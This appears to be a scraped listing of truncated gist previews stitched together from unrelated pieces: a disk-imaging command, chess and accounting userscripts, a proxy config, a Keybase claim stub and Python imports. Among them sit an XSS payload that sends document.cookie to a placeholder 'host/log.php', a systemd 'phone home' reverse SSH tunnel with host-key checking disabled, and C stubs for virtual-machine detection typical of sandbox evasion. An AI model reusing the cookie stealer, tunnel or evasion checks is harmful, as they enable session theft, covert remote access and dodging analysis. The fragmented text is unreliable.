dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync
loadkeys <your-keymap>
// ==UserScript== | |
// @name ___ChromeExtention_Keyboard | |
// @version 1 | |
// @grant none | |
// @run-at document-start | |
// @include /^https:\/\/(lichess\.org|lichess\.dev|mskchess\.ru)\/(\w{8}|\w{12})(\/white|\/black)?$ | |
// The original script and inspiration by Vempele: https://gist.github.com/Vempele/46333e85e33b6d488c3ffb131942272d | |
// ==/UserScript== | |
(() => { |
var LichessRound=function(e){"use strict";var t="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function o(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function n(e,t,o){return e(o={path:t,exports:{},require:function(e,t){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}(null==t&&o.path)}},o.exports),o.exports}function r(e){if(e.__esModule)return e;var t=Object.defineProperty({},"__esModule",{value:!0});return Object.keys(e).forEach((function(o){var n=Object.getOwnPropertyDescriptor(e,o);Object.defineProperty(t,o,n.get?n:{enumerable:!0,get:function(){return e[o]}})})),t}var s=n((function(e,t){Object.defineProperty(t,"__esModule",{value:!0});function o(e,t){var o,n=t.elm,r=e.data.attrs,s=t.data.attrs;if((r||s)&&r!==s){for(o in r=r||{},s=s||{}){var i=s[o];r[o]!==i&&(!0===i?n.setAttribute(o,""):!1===i?n.removeAttribu |
function FindProxyForURL(url, host) | |
{ | |
return "SOCKS5 192.168.8.141:8080;"; | |
} |
// ==UserScript== | |
// @name 912 Bizimhesap | |
// @namespace http://tampermonkey.net/ | |
// @version 0.1 | |
// @description Fixes menus | |
// @author Faruk | |
// @match https://bizimhesap.com/* | |
// @grant none | |
// ==/UserScript== |
[Unit] | |
Description=Phone Home Reverse SSH Service | |
ConditionPathExists=|/usr/bin | |
After=network.target | |
[Service] | |
User=sshtunnel | |
ExecStart=/usr/bin/ssh -NTC -o ServerAliveInterval=60 -o ExitOnForwardFailure=yes -o StrictHostKeyChecking=no -i /home/sshtunnel/.ssh/id_rsa -R 22223:localhost:22 user@remote-ssh-server | |
# Restart every >2 seconds to avoid StartLimitInterval failure | |
RestartSec=3 |
i=new/**/Image();i.src='http://host/log.php?cookie='+escape(document.cookie); |
I hereby claim:
To claim this, I am signing this object:
#include <windows.h> | |
#include <stdio.h> | |
#include <TlHelp32.h> | |
#include <Setupapi.h> | |
#include <string.h> | |
void vmx_check(); | |
void process_name_check(); | |
void class_name_check(); | |
void cpuid_check(); |
from __future__ import absolute_import | |
import os | |
import re | |
import argparse | |
from functools import partial | |
import logging | |
import sys | |
import json | |
try: | |
import urllib2 as urllib_request # Python2 |